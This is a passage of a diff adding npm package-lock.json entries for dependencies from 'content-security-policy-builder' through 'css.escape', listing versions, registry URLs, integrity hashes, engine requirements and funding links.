"https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ] + }, + "node_modules/content-security-policy-builder": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/content-security-policy-builder/-/content-security-policy-builder-2.1.0.tgz", + "integrity": "sha512-/MtLWhJVvJNkA9dVLAp6fg9LxD2gfI6R2Fi1hPmfjYXSahJJzcfvoeDOxSyp4NvxMuwWv3WMssE9o31DoULHrQ==", + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/content-type": { + "version": "1.0.5", + "resolved": "https://registry.npmjs.org/content-type/-/content-type-1.0.5.tgz", + "integrity": "sha512-nTjqfcBFEipKdXCv4YDQWCfmcLZKm81ldF0pAopTvyrFGVbcR6P/VAAd5G7N+0tTr8QqiU0tFadD6FK4NtJwOA==", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/contentful": { + "version": "10.8.5", + "resolved": "https://registry.npmjs.org/contentful/-/contentful-10.8.5.tgz", + "integrity": "sha512-aol2LmjRAmuOKQPITZtNasIkRFIECnrcQf2UiXGBZ2ldUpCAjyr533553fuGst2SeHZoKleLyYqFNgHcznDBUw==", + "dependencies": { + "@contentful/rich-text-types": "^16.0.2", + "axios": "^1.6.7", + "contentful-resolve-response": "^1.8.1", + "contentful-sdk-core": "^8.1.0", + "json-stringify-safe": "^5.0.1", + "type-fest": "^4.0.0" + }, + "engines": { + "node": ">=18" + } + }, + "node_modules/contentful-resolve-response": { + "version": "1.8.1", + "resolved": "https://registry.npmjs.org/contentful-resolve-response/-/contentful-resolve-response-1.8.1.tgz", + "integrity": "sha512-VXGK2c8dBIGcRCknqudKmkDr2PzsUYfjLN6hhx71T09UzoXOdA/c0kfDhsf/BBCBWPWcLaUgaJEFU0lCo45TSg==", + "dependencies": { + "fast-copy": "^2.1.7" + }, + "engines": { + "node": ">=4.7.2" + } + }, + "node_modules/contentful-sdk-core": { + "version": "8.1.2", + "resolved": "https://registry.npmjs.org/contentful-sdk-core/-/contentful-sdk-core-8.1.2.tgz", + "integrity": "sha512-XZvX2JMJF4YiICXLrHFv59KBHaQJ6ElqAP8gSNgnCu4x+pPG7Y1bC2JMNOiyAgJuGQGVUOcNZ5PmK+tsNEayYw==", + "dependencies": { + "fast-copy": "^2.1.7", + "lodash.isplainobject": "^4.0.6", + "lodash.isstring": "^4.0.1", + "p-throttle": "^4.1.1", + "qs": "^6.11.2" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/contentful/node_modules/type-fest": { + "version": "4.13.1", + "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-4.13.1.tgz", + "integrity": "sha512-ASMgM+Vf2cLwDMt1KXSkMUDSYCxtckDJs8zsaVF/mYteIsiARKCVtyXtcK38mIKbLTctZP8v6GMqdNaeI3fo7g==", + "engines": { + "node": ">=16" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/convert-source-map": { + "version": "1.8.0", + "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.8.0.tgz", + "integrity": "sha512-+OQdjP49zViI/6i7nIJpA8rAl4sV/JdPfU9nZs3VqOwGIgizICvuN2ru6fMd+4llL0tar18UYJXfZ/TWtmhUjA==", + "dev": true, + "dependencies": { + "safe-buffer": "~5.1.1" + } + }, + "node_modules/cookie": { + "version": "0.2.4", + "resolved": "https://registry.npmjs.org/cookie/-/cookie-0.2.4.tgz", + "integrity": "sha1-qMFVqnubLPLE0y68e5oKoojMxr0=", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/cookie-parser": { + "version": "1.4.6", + "resolved": "https://registry.npmjs.org/cookie-parser/-/cookie-parser-1.4.6.tgz", + "integrity": "sha512-z3IzaNjdwUC2olLIB5/ITd0/setiaFMLYiZJle7xg5Fe9KWAceil7xszYfHHBtDFYLSgJduS2Ty0P1uJdPDJeA==", + "dependencies": { + "cookie": "0.4.1", + "cookie-signature": "1.0.6" + }, + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/cookie-parser/node_modules/cookie": { + "version": "0.4.1", + "resolved": "https://registry.npmjs.org/cookie/-/cookie-0.4.1.tgz", + "integrity": "sha512-ZwrFkGJxUR3EIoXtO+yVE69Eb7KlixbaeAWfBQB9vVsNn/o+Yw69gBWSSDK825hQNdN+wF8zELf3dFNl/kxkUA==", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/cookie-parser/node_modules/cookie-signature": { + "version": "1.0.6", + "resolved": "https://registry.npmjs.org/cookie-signature/-/cookie-signature-1.0.6.tgz", + "integrity": "sha1-4wOogrNCzD7oylE6eZmXNNqzriw=" + }, + "node_modules/cookie-signature": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/cookie-signature/-/cookie-signature-1.2.1.tgz", + "integrity": "sha512-78KWk9T26NhzXtuL26cIJ8/qNHANyJ/ZYrmEXFzUmhZdjpBv+DlWlOANRTGBt48YcyslsLrj0bMLFTmXvLRCOw==", + "dev": true, + "engines": { + "node": ">=6.6.0" + } + }, + "node_modules/cookiejar": { + "version": "2.1.4", + "resolved": "https://registry.npmjs.org/cookiejar/-/cookiejar-2.1.4.tgz", + "integrity": "sha512-LDx6oHrK+PhzLKJU9j5S7/Y3jM/mUHvD/DeI1WQmJn652iPC5Y4TBzC9l+5OMOXlyTTA+SmVUPm0HQUwpD5Jqw==" + }, + "node_modules/copy-anything": { + "version": "2.0.6", + "resolved": "https://registry.npmjs.org/copy-anything/-/copy-anything-2.0.6.tgz", + "integrity": "sha512-1j20GZTsvKNkc4BY3NpMOM8tt///wY3FpIzozTOFO2ffuZcV61nojHXVKIy3WM+7ADCy5FVhdZYHYDdgTU0yJw==", + "dev": true, + "dependencies": { + "is-what": "^3.14.1" + }, + "funding": { + "url": "https://github.com/sponsors/mesqueeb" + } + }, + "node_modules/copy-descriptor": { + "version": "0.1.1", + "resolved": "https://registry.npmjs.org/copy-descriptor/-/copy-descriptor-0.1.1.tgz", + "integrity": "sha512-XgZ0pFcakEUlbwQEVNg3+QAis1FyTL3Qel9FYy8pSkQqoG3PNoT0bOCQtOXcOkur21r2Eq2kI+IE+gsmAEVlYw==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/copy-webpack-plugin": { + "version": "11.0.0", + "resolved": "https://registry.npmjs.org/copy-webpack-plugin/-/copy-webpack-plugin-11.0.0.tgz", + "integrity": "sha512-fX2MWpamkW0hZxMEg0+mYnA40LTosOSa5TqZ9GYIBzyJa9C3QUaMPSE2xAi/buNr8u89SfD9wHSQVBzrRa/SOQ==", + "dev": true, + "dependencies": { + "fast-glob": "^3.2.11", + "glob-parent": "^6.0.1", + "globby": "^13.1.1", + "normalize-path": "^3.0.0", + "schema-utils": "^4.0.0", + "serialize-javascript": "^6.0.0" + }, + "engines": { + "node": ">= 14.15.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + }, + "peerDependencies": { + "webpack": "^5.1.0" + } + }, + "node_modules/copy-webpack-plugin/node_modules/ajv": { + "version": "8.12.0", + "resolved": "https://registry.npmjs.org/ajv/-/ajv-8.12.0.tgz", + "integrity": "sha512-sRu1kpcO9yLtYxBKvqfTeh9KzZEwO3STyX1HT+4CaDzC6HpTGYhIhPIzj9XuKU7KYDwnaeh5hcOwjy1QuJzBPA==", + "dev": true, + "dependencies": { + "fast-deep-equal": "^3.1.1", + "json-schema-traverse": "^1.0.0", + "require-from-string": "^2.0.2", + "uri-js": "^4.2.2" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/epoberezkin" + } + }, + "node_modules/copy-webpack-plugin/node_modules/ajv-keywords": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/ajv-keywords/-/ajv-keywords-5.1.0.tgz", + "integrity": "sha512-YCS/JNFAUyr5vAuhk1DWm1CBxRHW9LbJ2ozWeemrIqpbsqKjHVxYPyi5GC0rjZIT5JxJ3virVTS8wk4i/Z+krw==", + "dev": true, + "dependencies": { + "fast-deep-equal": "^3.1.3" + }, + "peerDependencies": { + "ajv": "^8.8.2" + } + }, + "node_modules/copy-webpack-plugin/node_modules/glob-parent": { + "version": "6.0.2", + "resolved": "https://registry.npmjs.org/glob-parent/-/glob-parent-6.0.2.tgz", + "integrity": "sha512-XxwI8EOhVQgWp6iDL+3b0r86f4d6AX6zSU55HfB4ydCEuXLXc5FcYeOu+nnGftS4TEju/11rt4KJPTMgbfmv4A==", + "dev": true, + "dependencies": { + "is-glob": "^4.0.3" + }, + "engines": { + "node": ">=10.13.0" + } + }, + "node_modules/copy-webpack-plugin/node_modules/globby": { + "version": "13.1.4", + "resolved": "https://registry.npmjs.org/globby/-/globby-13.1.4.tgz", + "integrity": "sha512-iui/IiiW+QrJ1X1hKH5qwlMQyv34wJAYwH1vrf8b9kBA4sNiif3gKsMHa+BrdnOpEudWjpotfa7LrTzB1ERS/g==", + "dev": true, + "dependencies": { + "dir-glob": "^3.0.1", + "fast-glob": "^3.2.11", + "ignore": "^5.2.0", + "merge2": "^1.4.1", + "slash": "^4.0.0" + }, + "engines": { + "node": "^12.20.0 || ^14.13.1 || >=16.0.0" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/copy-webpack-plugin/node_modules/json-schema-traverse": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-1.0.0.tgz", + "integrity": "sha512-NM8/P9n3XjXhIZn1lLhkFaACTOURQXjWhV4BA/RnOv8xvgqtqpAX9IO4mRQxSx1Rlo4tqzeqb0sOlruaOy3dug==", + "dev": true + }, + "node_modules/copy-webpack-plugin/node_modules/schema-utils": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/schema-utils/-/schema-utils-4.0.1.tgz", + "integrity": "sha512-lELhBAAly9NowEsX0yZBlw9ahZG+sK/1RJ21EpzdYHKEs13Vku3LJ+MIPhh4sMs0oCCeufZQEQbMekiA4vuVIQ==", + "dev": true, + "dependencies": { + "@types/json-schema": "^7.0.9", + "ajv": "^8.9.0", + "ajv-formats": "^2.1.1", + "ajv-keywords": "^5.1.0" + }, + "engines": { + "node": ">= 12.13.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + } + }, + "node_modules/copy-webpack-plugin/node_modules/slash": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/slash/-/slash-4.0.0.tgz", + "integrity": "sha512-3dOsAHXXUkQTpOYcoAxLIorMTp4gIQr5IW3iVb7A7lFIp0VHhnynm9izx6TssdrIcVIESAlVjtnO2K8bg+Coew==", + "dev": true, + "engines": { + "node": ">=12" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/core-js": { + "version": "3.38.1", + "resolved": "https://registry.npmjs.org/core-js/-/core-js-3.38.1.tgz", + "integrity": "sha512-OP35aUorbU3Zvlx7pjsFdu1rGNnD4pgw/CWoYzRY3t2EzoVT7shKHY1dlAy3f41cGIO7ZDPQimhGFTlEYkG/Hw==", + "dev": true, + "hasInstallScript": true, + "license": "MIT", + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/core-js" + } + }, + "node_modules/core-js-compat": { + "version": "3.38.1", + "resolved": "https://registry.npmjs.org/core-js-compat/-/core-js-compat-3.38.1.tgz", + "integrity": "sha512-JRH6gfXxGmrzF3tZ57lFx97YARxCXPaMzPo6jELZhv88pBH5VXpQ+y0znKGlFnzuaihqhLbefxSJxWJMPtfDzw==", + "dev": true, + "dependencies": { + "browserslist": "^4.23.3" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/core-js" + } + }, + "node_modules/core-js-pure": { + "version": "3.30.2", + "resolved": "https://registry.npmjs.org/core-js-pure/-/core-js-pure-3.30.2.tgz", + "integrity": "sha512-p/npFUJXXBkCCTIlEGBdghofn00jWG6ZOtdoIXSJmAu2QBvN0IqpZXWweOytcwE6cfx8ZvVUy1vw8zxhe4Y2vg==", + "hasInstallScript": true, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/core-js" + } + }, + "node_modules/core-util-is": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", + "integrity": "sha1-tf1UIgqivFq1eqtxQMlAdUUDwac=" + }, + "node_modules/cors": { + "version": "2.8.5", + "resolved": "https://registry.npmjs.org/cors/-/cors-2.8.5.tgz", + "integrity": "sha512-KIHbLJqu73RGr/hnbrO9uBeixNGuvSQjul/jdFvS/KFSIH1hWVd1ng7zOHx+YrEfInLG7q4n6GHQ9cDtxv/P6g==", + "dev": true, + "dependencies": { + "object-assign": "^4", + "vary": "^1" + }, + "engines": { + "node": ">= 0.10" + } + }, + "node_modules/cosmiconfig": { + "version": "7.0.1", + "resolved": "https://registry.npmjs.org/cosmiconfig/-/cosmiconfig-7.0.1.tgz", + "integrity": "sha512-a1YWNUV2HwGimB7dU2s1wUMurNKjpx60HxBB6xUM8Re+2s1g1IIfJvFR0/iCF+XHdE0GMTKTuLR32UQff4TEyQ==", + "dev": true, + "dependencies": { + "@types/parse-json": "^4.0.0", + "import-fresh": "^3.2.1", + "parse-json": "^5.0.0", + "path-type": "^4.0.0", + "yaml": "^1.10.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/crc-32": { + "version": "1.2.2", + "resolved": "https://registry.npmjs.org/crc-32/-/crc-32-1.2.2.tgz", + "integrity": "sha512-ROmzCKrTnOwybPcJApAA6WBWij23HVfGVNKqqrZpuyZOHqK2CwHSvpGuyt/UNNvaIjEd8X5IFGp4Mh+Ie1IHJQ==", + "bin": { + "crc32": "bin/crc32.njs" + }, + "engines": { + "node": ">=0.8" + } + }, + "node_modules/create-storybook": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/create-storybook/-/create-storybook-8.6.4.tgz", + "integrity": "sha512-YwxtA+CtGHWYvQrFh1dat3Q/kXWHekok0MAqaorD9/Mf/cpybA8afHDsdq2PDq0LXg0Od3QI4Ha04+eaB6F8gA==", + "dev": true, + "license": "MIT", + "dependencies": { + "recast": "^0.23.5", + "semver": "^7.6.2" + }, + "bin": { + "create-storybook": "bin/index.cjs" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + } + }, + "node_modules/create-storybook/node_modules/semver": { + "version": "7.7.1", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.7.1.tgz", + "integrity": "sha512-hlq8tAfn0m/61p4BVRcPzIGr6LKiMwo4VM6dGi6pt4qcRkmNzTcWq6eCEjEh+qXjkMDvPlOFFSGwQjoEa6gyMA==", + "dev": true, + "license": "ISC", + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/crelt": { + "version": "1.0.5", + "resolved": "https://registry.npmjs.org/crelt/-/crelt-1.0.5.tgz", + "integrity": "sha512-+BO9wPPi+DWTDcNYhr/W90myha8ptzftZT+LwcmUbbok0rcP/fequmFYCw8NMoH7pkAZQzU78b3kYrlua5a9eA==", + "dev": true + }, + "node_modules/cron": { + "version": "1.8.2", + "resolved": "https://registry.npmjs.org/cron/-/cron-1.8.2.tgz", + "integrity": "sha512-Gk2c4y6xKEO8FSAUTklqtfSr7oTq0CiPQeLBG5Fl0qoXpZyMcj1SG59YL+hqq04bu6/IuEA7lMkYDAplQNKkyg==", + "dependencies": { + "moment-timezone": "^0.5.x" + } + }, + "node_modules/cron-parser": { + "version": "2.18.0", + "resolved": "https://registry.npmjs.org/cron-parser/-/cron-parser-2.18.0.tgz", + "integrity": "sha512-s4odpheTyydAbTBQepsqd2rNWGa2iV3cyo8g7zbI2QQYGLVsfbhmwukayS1XHppe02Oy1fg7mg6xoaraVJeEcg==", + "dependencies": { + "is-nan": "^1.3.0", + "moment-timezone": "^0.5.31" + }, + "engines": { + "node": ">=0.8" + } + }, + "node_modules/cross-env": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/cross-env/-/cross-env-4.0.0.tgz", + "integrity": "sha512-dofkcyPqOy/AR14nbYSpk+TZ4IJZqg2as+/mQNkzh+7Xba2I1I1eyg/1G2dtSpD2LHjcEWwnGquiH2OP5LoeOw==", + "license": "MIT", + "dependencies": { + "cross-spawn": "^5.1.0", + "is-windows": "^1.0.0" + }, + "bin": { + "cross-env": "dist/bin/cross-env.js" + }, + "engines": { + "node": ">=4.0" + } + }, + "node_modules/cross-fetch": { + "version": "3.1.8", + "resolved": "https://registry.npmjs.org/cross-fetch/-/cross-fetch-3.1.8.tgz", + "integrity": "sha512-cvA+JwZoU0Xq+h6WkMvAUqPEYy92Obet6UdKLfW60qn99ftItKjB5T+BkyWOFWe2pUyfQ+IJHmpOTznqk1M6Kg==", + "dependencies": { + "node-fetch": "^2.6.12" + } + }, + "node_modules/cross-spawn": { + "version": "7.0.6", + "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.6.tgz", + "integrity": "sha512-uV2QOWP2nWzsy2aMp8aRibhi9dlzF5Hgh5SHaB9OiTGEyDTiJJyx0uy51QXdyWbtAHNua4XJzUKca3OzKUd3vA==", + "license": "MIT", + "dependencies": { + "path-key": "^3.1.0", + "shebang-command": "^2.0.0", + "which": "^2.0.1" + }, + "engines": { + "node": ">= 8" + } + }, + "node_modules/csrf": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/csrf/-/csrf-3.1.0.tgz", + "integrity": "sha512-uTqEnCvWRk042asU6JtapDTcJeeailFy4ydOQS28bj1hcLnYRiqi8SsD2jS412AY1I/4qdOwWZun774iqywf9w==", + "dependencies": { + "rndm": "1.2.0", + "tsscmp": "1.0.6", + "uid-safe": "2.1.5" + }, + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/css-blank-pseudo": { + "version": "5.0.2", + "resolved": "https://registry.npmjs.org/css-blank-pseudo/-/css-blank-pseudo-5.0.2.tgz", + "integrity": "sha512-aCU4AZ7uEcVSUzagTlA9pHciz7aWPKA/YzrEkpdSopJ2pvhIxiQ5sYeMz1/KByxlIo4XBdvMNJAVKMg/GRnhfw==", + "dev": true, + "dependencies": { + "postcss-selector-parser": "^6.0.10" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/css-declaration-sorter": { + "version": "6.4.1", + "resolved": "https://registry.npmjs.org/css-declaration-sorter/-/css-declaration-sorter-6.4.1.tgz", + "integrity": "sha512-rtdthzxKuyq6IzqX6jEcIzQF/YqccluefyCYheovBOLhFT/drQA9zj/UbRAa9J7C0o6EG6u3E6g+vKkay7/k3g==", + "dev": true, + "engines": { + "node": "^10 || ^12 || >=14" + }, + "peerDependencies": { + "postcss": "^8.0.9" + } + }, + "node_modules/css-functions-list": { + "version": "3.2.2", + "resolved": "https://registry.npmjs.org/css-functions-list/-/css-functions-list-3.2.2.tgz", + "integrity": "sha512-c+N0v6wbKVxTu5gOBBFkr9BEdBWaqqjQeiJ8QvSRIJOf+UxlJh930m8e6/WNeODIK0mYLFkoONrnj16i2EcvfQ==", + "dev": true, + "peer": true, + "engines": { + "node": ">=12 || >=16" + } + }, + "node_modules/css-has-pseudo": { + "version": "5.0.2", + "resolved": "https://registry.npmjs.org/css-has-pseudo/-/css-has-pseudo-5.0.2.tgz", + "integrity": "sha512-q+U+4QdwwB7T9VEW/LyO6CFrLAeLqOykC5mDqJXc7aKZAhDbq7BvGT13VGJe+IwBfdN2o3Xdw2kJ5IxwV1Sc9Q==", + "dev": true, + "dependencies": { + "@csstools/selector-specificity": "^2.0.1", + "postcss-selector-parser": "^6.0.10", + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/css-loader": { + "version": "6.8.1", + "resolved": "https://registry.npmjs.org/css-loader/-/css-loader-6.8.1.tgz", + "integrity": "sha512-xDAXtEVGlD0gJ07iclwWVkLoZOpEvAWaSyf6W18S2pOC//K8+qUDIx8IIT3D+HjnmkJPQeesOPv5aiUaJsCM2g==", + "dev": true, + "dependencies": { + "icss-utils": "^5.1.0", + "postcss": "^8.4.21", + "postcss-modules-extract-imports": "^3.0.0", + "postcss-modules-local-by-default": "^4.0.3", + "postcss-modules-scope": "^3.0.0", + "postcss-modules-values": "^4.0.0", + "postcss-value-parser": "^4.2.0", + "semver": "^7.3.8" + }, + "engines": { + "node": ">= 12.13.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + }, + "peerDependencies": { + "webpack": "^5.0.0" + } + }, + "node_modules/css-loader/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dev": true, + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/css-loader/node_modules/postcss-modules-extract-imports": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/postcss-modules-extract-imports/-/postcss-modules-extract-imports-3.0.0.tgz", + "integrity": "sha512-bdHleFnP3kZ4NYDhuGlVK+CMrQ/pqUm8bx/oGL93K6gVwiclvX5x0n76fYMKuIGKzlABOy13zsvqjb0f92TEXw==", + "dev": true, + "engines": { + "node": "^10 || ^12 || >= 14" + }, + "peerDependencies": { + "postcss": "^8.1.0" + } + }, + "node_modules/css-loader/node_modules/postcss-modules-scope": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/postcss-modules-scope/-/postcss-modules-scope-3.0.0.tgz", + "integrity": "sha512-hncihwFA2yPath8oZ15PZqvWGkWf+XUfQgUGamS4LqoP1anQLOsOJw0vr7J7IwLpoY9fatA2qiGUGmuZL0Iqlg==", + "dev": true, + "dependencies": { + "postcss-selector-parser": "^6.0.4" + }, + "engines": { + "node": "^10 || ^12 || >= 14" + }, + "peerDependencies": { + "postcss": "^8.1.0" + } + }, + "node_modules/css-loader/node_modules/postcss-modules-values": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/postcss-modules-values/-/postcss-modules-values-4.0.0.tgz", + "integrity": "sha512-RDxHkAiEGI78gS2ofyvCsu7iycRv7oqw5xMWn9iMoR0N/7mf9D50ecQqUo5BZ9Zh2vH4bCUR/ktCqbB9m8vJjQ==", + "dev": true, + "dependencies": { + "icss-utils": "^5.0.0" + }, + "engines": { + "node": "^10 || ^12 || >= 14" + }, + "peerDependencies": { + "postcss": "^8.1.0" + } + }, + "node_modules/css-loader/node_modules/semver": { + "version": "7.5.4", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", + "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", + "dev": true, + "dependencies": { + "lru-cache": "^6.0.0" + }, + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/css-loader/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", + "dev": true + }, + "node_modules/css-mediaquery": { + "version": "0.1.2", + "resolved": "https://registry.npmjs.org/css-mediaquery/-/css-mediaquery-0.1.2.tgz", + "integrity": "sha512-COtn4EROW5dBGlE/4PiKnh6rZpAPxDeFLaEEwt4i10jpDMFt2EhQGS79QmmrO+iKCHv0PU/HrOWEhijFd1x99Q==" + }, + "node_modules/css-minimizer-webpack-plugin": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/css-minimizer-webpack-plugin/-/css-minimizer-webpack-plugin-5.0.1.tgz", + "integrity": "sha512-3caImjKFQkS+ws1TGcFn0V1HyDJFq1Euy589JlD6/3rV2kj+w7r5G9WDMgSHvpvXHNZ2calVypZWuEDQd9wfLg==", + "dev": true, + "dependencies": { + "@jridgewell/trace-mapping": "^0.3.18", + "cssnano": "^6.0.1", + "jest-worker": "^29.4.3", + "postcss": "^8.4.24", + "schema-utils": "^4.0.1", + "serialize-javascript": "^6.0.1" + }, + "engines": { + "node": ">= 14.15.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + }, + "peerDependencies": { + "webpack": "^5.0.0" + }, + "peerDependenciesMeta": { + "@parcel/css": { + "optional": true + }, + "@swc/css": { + "optional": true + }, + "clean-css": { + "optional": true + }, + "csso": { + "optional": true + }, + "esbuild": { + "optional": true + }, + "lightningcss": { + "optional": true + } + } + }, + "node_modules/css-minimizer-webpack-plugin/node_modules/ajv": { + "version": "8.12.0", + "resolved": "https://registry.npmjs.org/ajv/-/ajv-8.12.0.tgz", + "integrity": "sha512-sRu1kpcO9yLtYxBKvqfTeh9KzZEwO3STyX1HT+4CaDzC6HpTGYhIhPIzj9XuKU7KYDwnaeh5hcOwjy1QuJzBPA==", + "dev": true, + "dependencies": { + "fast-deep-equal": "^3.1.1", + "json-schema-traverse": "^1.0.0", + "require-from-string": "^2.0.2", + "uri-js": "^4.2.2" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/epoberezkin" + } + }, + "node_modules/css-minimizer-webpack-plugin/node_modules/ajv-keywords": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/ajv-keywords/-/ajv-keywords-5.1.0.tgz", + "integrity": "sha512-YCS/JNFAUyr5vAuhk1DWm1CBxRHW9LbJ2ozWeemrIqpbsqKjHVxYPyi5GC0rjZIT5JxJ3virVTS8wk4i/Z+krw==", + "dev": true, + "dependencies": { + "fast-deep-equal": "^3.1.3" + }, + "peerDependencies": { + "ajv": "^8.8.2" + } + }, + "node_modules/css-minimizer-webpack-plugin/node_modules/jest-worker": { + "version": "29.5.0", + "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.5.0.tgz", + "integrity": "sha512-NcrQnevGoSp4b5kg+akIpthoAFHxPBcb5P6mYPY0fUNT+sSvmtu6jlkEle3anczUKIKEbMxFimk9oTP/tpIPgA==", + "dev": true, + "dependencies": { + "@types/node": "*", + "jest-util": "^29.5.0", + "merge-stream": "^2.0.0", + "supports-color": "^8.0.0" + }, + "engines": { + "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + } + }, + "node_modules/css-minimizer-webpack-plugin/node_modules/json-schema-traverse": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-1.0.0.tgz", + "integrity": "sha512-NM8/P9n3XjXhIZn1lLhkFaACTOURQXjWhV4BA/RnOv8xvgqtqpAX9IO4mRQxSx1Rlo4tqzeqb0sOlruaOy3dug==", + "dev": true + }, + "node_modules/css-minimizer-webpack-plugin/node_modules/schema-utils": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/schema-utils/-/schema-utils-4.0.1.tgz", + "integrity": "sha512-lELhBAAly9NowEsX0yZBlw9ahZG+sK/1RJ21EpzdYHKEs13Vku3LJ+MIPhh4sMs0oCCeufZQEQbMekiA4vuVIQ==", + "dev": true, + "dependencies": { + "@types/json-schema": "^7.0.9", + "ajv": "^8.9.0", + "ajv-formats": "^2.1.1", + "ajv-keywords": "^5.1.0" + }, + "engines": { + "node": ">= 12.13.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + } + }, + "node_modules/css-prefers-color-scheme": { + "version": "8.0.2", + "resolved": "https://registry.npmjs.org/css-prefers-color-scheme/-/css-prefers-color-scheme-8.0.2.tgz", + "integrity": "sha512-OvFghizHJ45x7nsJJUSYLyQNTzsCU8yWjxAc/nhPQg1pbs18LMoET8N3kOweFDPy0JV0OSXN2iqRFhPBHYOeMA==", + "dev": true, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/css-select": { + "version": "4.2.1", + "resolved": "https://registry.npmjs.org/css-select/-/css-select-4.2.1.tgz", + "integrity": "sha512-/aUslKhzkTNCQUB2qTX84lVmfia9NyjP3WpDGtj/WxhwBzWBYUV3DgUpurHTme8UTPcPlAD1DJ+b0nN/t50zDQ==", + "dev": true, + "dependencies": { + "boolbase": "^1.0.0", + "css-what": "^5.1.0", + "domhandler": "^4.3.0", + "domutils": "^2.8.0", + "nth-check": "^2.0.1" + }, + "funding": { + "url": "https://github.com/sponsors/fb55" + } + }, + "node_modules/css-tree": { + "version": "2.3.1", + "resolved": "https://registry.npmjs.org/css-tree/-/css-tree-2.3.1.tgz", + "integrity": "sha512-6Fv1DV/TYw//QF5IzQdqsNDjx/wc8TrMBZsqjL9eW01tWb7R7k/mq+/VXfJCl7SoD5emsJop9cOByJZfs8hYIw==", + "dev": true, + "dependencies": { + "mdn-data": "2.0.30", + "source-map-js": "^1.0.1" + }, + "engines": { + "node": "^10 || ^12.20.0 || ^14.13.0 || >=15.0.0" + } + }, + "node_modules/css-what": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/css-what/-/css-what-5.1.0.tgz", + "integrity": "sha512-arSMRWIIFY0hV8pIxZMEfmMI47Wj3R/aWpZDDxWYCPEiOMv6tfOrnpDtgxBYPEQD4V0Y/958+1TdC3iWTFcUPw==", + "dev": true, + "engines": { + "node": ">= 6" + }, + "funding": { + "url": "https://github.com/sponsors/fb55" + } + }, + "node_modules/css.escape": { + "version": "1.5.1", + 